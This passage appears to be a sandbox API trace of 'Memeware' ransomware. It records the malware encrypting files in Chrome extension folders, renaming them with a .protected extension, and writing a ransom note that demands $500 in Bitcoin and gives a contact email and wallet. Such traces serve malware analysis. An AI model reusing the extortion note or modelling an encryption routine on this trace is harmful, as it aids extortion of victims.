lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.779] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.779] CloseHandle (hObject=0x168) returned 1 [0079.779] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\messages.json.protected") returned 167 [0079.779] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\messages.json.protected")) returned 1 [0079.779] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.779] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.779] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\RESTORE_FILES.txt") returned 161 [0079.779] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\hu\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.780] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.780] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.780] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.780] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.780] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.780] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.781] CloseHandle (hObject=0x164) returned 1 [0079.781] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.781] lstrcmpiW (lpString1="id", lpString2="Windows") returned -1 [0079.781] lstrcmpiW (lpString1="id", lpString2="Program Files") returned -1 [0079.781] lstrcmpiW (lpString1="id", lpString2="Program Files (x86)") returned -1 [0079.781] lstrcmpiW (lpString1="id", lpString2="$Recycle.bin") returned 1 [0079.781] lstrcmpiW (lpString1="id", lpString2="System Volume Information") returned -1 [0079.781] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id") returned 143 [0079.781] lstrcmpW (lpString1="id", lpString2=".") returned 1 [0079.781] lstrcmpW (lpString1="id", lpString2="..") returned 1 [0079.781] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\*") returned 145 [0079.781] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.781] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.781] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.781] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.781] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.781] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.781] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\.") returned 145 [0079.781] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.781] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.781] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.781] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.781] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.781] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.781] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.781] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\..") returned 146 [0079.781] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.781] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.781] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.781] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.781] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.781] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.781] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.781] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.781] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\messages.json") returned 157 [0079.782] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.782] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.782] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.782] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.782] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.782] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\messages.json") returned 157 [0079.782] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.782] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\messages.json") returned 157 [0079.782] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.782] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\messages.json") returned 157 [0079.782] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.782] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.783] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.783] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.783] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.783] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.783] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.783] CloseHandle (hObject=0x168) returned 1 [0079.783] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\messages.json.protected") returned 167 [0079.783] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\messages.json.protected")) returned 1 [0079.784] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.784] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.784] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\RESTORE_FILES.txt") returned 161 [0079.784] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\id\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.784] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.784] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.785] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.785] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.785] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.785] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.785] CloseHandle (hObject=0x164) returned 1 [0079.785] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.785] lstrcmpiW (lpString1="it", lpString2="Windows") returned -1 [0079.785] lstrcmpiW (lpString1="it", lpString2="Program Files") returned -1 [0079.785] lstrcmpiW (lpString1="it", lpString2="Program Files (x86)") returned -1 [0079.785] lstrcmpiW (lpString1="it", lpString2="$Recycle.bin") returned 1 [0079.785] lstrcmpiW (lpString1="it", lpString2="System Volume Information") returned -1 [0079.785] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it") returned 143 [0079.785] lstrcmpW (lpString1="it", lpString2=".") returned 1 [0079.785] lstrcmpW (lpString1="it", lpString2="..") returned 1 [0079.785] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\*") returned 145 [0079.785] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.786] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.786] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.786] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.786] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.786] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.786] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\.") returned 145 [0079.786] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.786] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.786] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.786] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.786] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.786] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.786] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.786] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\..") returned 146 [0079.786] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.786] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.786] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.786] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.786] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.786] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.786] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.786] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.786] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\messages.json") returned 157 [0079.786] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.786] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.786] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.786] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.787] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.787] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\messages.json") returned 157 [0079.787] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.787] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\messages.json") returned 157 [0079.787] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.787] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\blpcfgokakmgnkcojhhkbfbldkacnbeo\\4.2.8_0\\_locales\\it\\messages.json") returned 157 [0079.787] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.787] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.788] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff4d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.788] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xb3, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xb3, lpOverlapped=0x0) returned 1 [0079.788] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.788] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.788] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: 